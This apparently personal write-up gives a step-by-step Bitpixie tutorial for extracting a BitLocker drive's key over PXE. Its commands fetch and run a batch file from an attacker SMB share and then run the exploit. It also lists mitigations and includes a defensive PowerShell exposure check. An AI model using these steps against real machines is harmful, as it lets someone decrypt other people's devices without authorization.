Decrypting a BitLocker drive

Problem:

The laptop has BitLocker encryption enabled, but the user no longer has access to this Windows installation.

Approach:

The Bitpixie bug was discovered by Rairii and assigned CVE-2023-21563. The first public implementation of this "attack" was demonstrated by th0mas at 38c3.

Links:

Short summary – https://zendata.security/2025/05/15/bitlocker-bypassed-a-simple-key-extraction-is-enough-to-break-the-encryption

CCC talk recording – https://media.ccc.de/v/38c3-windows-bitlocker-screwed-without-a-screwdriver

HowTo on GitHub – https://github.com/andigandhi/bitpixie

Detailed article on the procedure – https://neodyme.io/en/blog/bitlocker_screwed_without_a_screwdriver

Solution via Mistral AI:

Here’s a step-by-step tutorial for the Bitpixie Proof of Concept (PoC) attack, based on the provided documentation. This attack exploits a vulnerability in BitLocker (CVE-2023-21563) to extract the Volume Master Key (VMK) and decrypt the drive without pre-boot authentication.


1. General Concept

  • Goal: Extract the BitLocker VMK from memory by booting the target machine into a custom PXE environment.
  • Vulnerability: BitLocker’s reliance on unprotected boot configurations and the ability to modify the Boot Configuration Data (BCD) file.
  • Mitigations: Use BitLocker with Pre-Boot Authentication (TPM+PIN), apply patch KB5025885, or disable UEFI network stack.

2. Prerequisites for the Attack

Target Machine Requirements

  • BitLocker enabled without pre-boot authentication.
  • PXE boot not disabled in BIOS (or can be enabled via external network card).
  • PCR Validation does not include PCR4 (check with manage-bde -protectors -get c:).

Attacker Machine Requirements

  • Install required packages:
      sudo apt install dnsmasq libwin-hivex-perl python3-impacket
  • Clone the Bitpixie repository and build the initramfs:
      git clone --depth 1 https://github.com/andigandhi/bitpixie
      cd bitpixie
      ./build.sh

3. Step-by-Step Attack Process

Step 1: Start Attacker Servers

  • TFTP/DHCP Server (for PXE boot): ./start-server.sh pxe <interface>
  • SMB Server (for BCD file exchange): ./start-server.sh smb <interface>

Step 2: Extract the BCD File from the Victim

  • On the victim machine, boot into Advanced Boot Options (hold Shift while clicking Restart).
  • Open Command Prompt (Troubleshoot → Advanced Options → Command Prompt).
  • Run:
      wpeutil initializenetwork
      net use S: \\<attacker-ip>\smb
      cd %TEMP%
      copy S:\create-bcd.bat .
      .\create-bcd.bat
    This exports the BCD file to the attacker’s SMB share.

Step 3: Boot the Victim via PXE

  • In Advanced Boot Options, select Use a device → IPv4 PXE Boot.
  • The victim boots into the Alpine initramfs (custom PXE environment).

Step 4: Extract the VMK

  • Log in as root in the initramfs.
  • Run the exploit: run-exploit /dev/sda3
  • The BitLocker partition is mounted at /root/mnt. If it fails, reboot and retry.

Step 5: Access the Decrypted Drive

  • The VMK is extracted, and the drive is now accessible.
  • Unmount after use: umount /root/mnt

4. Mitigations

  • Enable Pre-Boot Authentication (TPM+PIN).
  • Apply patch KB5025885 (Microsoft’s fix).
  • Disable UEFI network stack (prevents PXE boot).
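A defender-side check for the two target preconditions listed under section 2 (no pre-boot authentication, PCR 4 not part of the validation profile) and for the first mitigation under section 4, added here as an example and not part of the original post or the bitpixie project. It assumes an elevated PowerShell session on the Windows host being audited, the built-in Get-BitLockerVolume cmdlet, and English-language manage-bde output (the "PCR Validation Profile" label is localized on non-English installations).

```powershell
# Added example: audit one BitLocker volume for the Bitpixie preconditions.
# Assumes an elevated session and English manage-bde output.
function Test-BitpixieExposure {
    param([string]$MountPoint = 'C:')

    $vol   = Get-BitLockerVolume -MountPoint $MountPoint
    $types = @($vol.KeyProtector | ForEach-Object { $_.KeyProtectorType })

    # Pre-boot authentication (TPM+PIN, optionally with a startup key)
    # is the mitigation the tutorial recommends first.
    $hasPreBootAuth = ($types -contains 'TpmPin') -or
                      ($types -contains 'TpmPinStartupKey')

    # manage-bde prints the TPM protector's PCR list after the line
    # "PCR Validation Profile:", either on that line or on the next one.
    $lines = (& manage-bde -protectors -get $MountPoint 2>&1 | Out-String) -split "`r?`n"
    $pcrs  = @()
    for ($i = 0; $i -lt $lines.Count; $i++) {
        if ($lines[$i] -match 'PCR Validation Profile:\s*(.*)$') {
            $list = $Matches[1].Trim()
            if (-not $list -and ($i + 1) -lt $lines.Count) { $list = $lines[$i + 1].Trim() }
            $pcrs = @($list -split '\s*,\s*' |
                      Where-Object { $_ -match '^\d+$' } |
                      ForEach-Object { [int]$_ })
            break
        }
    }
    # PCR 4 measures the boot manager; a profile without it (e.g. 7, 11)
    # is what section 2 lists as a precondition.
    $bindsPcr4 = $pcrs -contains 4

    [pscustomobject]@{
        MountPoint    = $MountPoint
        Protection    = $vol.ProtectionStatus
        KeyProtectors = ($types -join ', ')
        PcrProfile    = ($pcrs -join ', ')
        PreBootAuth   = $hasPreBootAuth
        BindsPcr4     = $bindsPcr4
        # Exposed: encrypted, TPM-only unlock, and PCR 4 not measured.
        Exposed       = ($vol.ProtectionStatus -eq 'On') -and
                        (-not $hasPreBootAuth) -and (-not $bindsPcr4)
    }
}

Test-BitpixieExposure -MountPoint 'C:' | Format-List
```

A result with Exposed = True means the volume matches the configuration the tutorial targets; the remaining mitigations (the boot-manager update referenced as KB5025885 and disabling the UEFI network stack) are firmware and patch-state checks that this script does not cover.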

5. Testing the Exploit (QEMU)

  • Install Windows 11 in QEMU with BitLocker enabled.
  • Configure the network interface in VirtManager:
      <interface type="network">
        <model type="virtio"/>
        <rom enabled="no"/>
      </interface>
  • Boot the VM via PXE and test the exploit.

6. Alternative BCD Extraction (Not Recommended)

  • Boot the victim into the Linux initramfs via PXE.
  • Run the BCD extractor script on the attacker machine: ./grab-bcd.sh /dev/sda
  • The modified BCD file is created in pxe-server/Boot/BCD.

Summary

This attack exploits BitLocker’s reliance on unprotected boot configurations. By modifying the BCD file and booting via PXE, the VMK can be extracted and the drive decrypted. Mitigations include enabling TPM+PIN, patching, or disabling PXE.
